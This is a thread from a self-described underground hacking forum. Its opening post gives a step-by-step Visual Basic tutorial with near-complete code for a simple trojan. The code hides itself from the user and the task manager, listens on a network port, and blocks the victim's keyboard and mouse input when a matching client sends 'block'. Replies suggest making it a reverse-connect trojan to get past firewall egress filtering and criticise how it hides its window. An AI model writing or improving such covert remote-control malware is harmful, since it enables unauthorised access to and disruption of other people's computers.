For Support and Advertisement you can contact  701491310 [email protected]
Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
simple trojan in VB
#1
Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code.

Server
The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it. To do this you start by using VB



Code:
Private Sub Form_Load()      
         Me.Visible = False  
End Sub
This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier. So to get our application hidden from that a little better we make our code look like this.



Code:
Private Sub Form_Load()      
          Me.Visible = False      
          App.TaskVisible = False  
End Sub
So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win but you can name yours what ever.

Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.



Code:
Private Sub Form_Load()  
          Me.Visible = False      
          App.TaskVisible = False      
          win.LocalPort = 2999      
          win.RemotePort = 455      
          win.Listen  
End Sub
This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat. Lets make it block the input of the user completely when we tell it to!

To do this little devious thing we need to add a module with the following code

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

Then we add this code to our main form:



Code:
Private Sub win_ConnectionRequest(ByVal requestID As Long)  
         win.Close      
         win.Accept requestID  
End Sub  

Private Sub win_DataArrival(ByVal bytesTotal As Long)      
           win.GetData GotDat      
           DoActions (GotDat)  
End Sub






The code in the module is called a windows API. It uses a dll file to do tasks that we want. Now this code still won’t block the users input but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. So add this code to the module and we are about done with the server of the Trojan!



Code:
Public Function DoActions(x As String)  
           Dim Action      
           Select Case x              
                      Case "block"              
                      Action = BlockInput(True)      
            End Select  
End Function
Ok now we have a program that when the data “block” is sent to it on port 2999 it will block the users input. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding a unblock feature of your own. To do that just call the BlockInput function with the argument False instead of true.

Main Form



Code:
Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long) ' As corrected by steroidsRlegal
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
     win.GetData GotDat
     DoActions (GotDat)
End Sub
Remember to add your winsock control and name it to win if you use this code.
That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command of “block” lets make a client that sends the command “block”.

Make a form and add a Winsock Control, a text box, and three buttons. The Text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now lets look at the code we would use to make our Client.





Code:
Private Sub cmdConnect_Click()
                 IpAddy = txtIp.Text      
                 Win.Close      
                 Win.RemotePort = 2999      
                 Win.RemoteHost = IpAddy      
                 Win.LocalPort = 9999      
                 Win.Connect      
                 cmdConnect.Enabled = False  
End Sub  

Private Sub cmdDisconnect_Click()      
                 Win.Close      
                 cmdConnect.Enabled = True  
End Sub              

Private Sub cmdBlockInput_Click()      
                  Win.SendData "block"  
End Sub
That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send the “block” data to block off their input.
Reply
For Support and Advertisement you can contact  701491310 [email protected]
#2
that is not a good idea at all first of all do not use a windows form you will write a command line executable hide it correctly and put in a reference to the windows.forms namespace never do this just a bad idea no offense i once made this mistake second of all always make it a reverse connect trojan as egress filtering over port 1024 is usually allowed by a system level or hardware level firewall this being said i can write a small reverse connect trojan for you guys and all that but i didnt try it multi yet so not that advanced as im not into .net that much
Reply
#3
I have to agree with tutmoses.
The PoC is a good approach at demystifying the complexity of a RAT. Which in its basics is pretty trivial.

However, I constantly see VB.NET developers who start off with a WinForms application and hide the System.Windows.Forms.Form by calling Hide().
Doing so seems to me very much like lack of skills, honestly. Usually, there is a main entry point where you can implement a message loop. However, way too many times I just see "Create new solution -> WinForms Application -> Call Hide() like I always do"

Why?

There is no answer to this, except not knowing how a program is composed. Please keep up on these basics as well.
Reply
 


Forum Jump:


Users browsing this thread: 1 Guest(s)
For Support and Advertisement you can contact  701491310 [email protected]

About Offensive Community

Offensive Community is a world best underground hacking forum that provides tutorials, latest hacking techniques, free tools and a great online teaching to our members. Join the forum Now.

Feel free to join our community.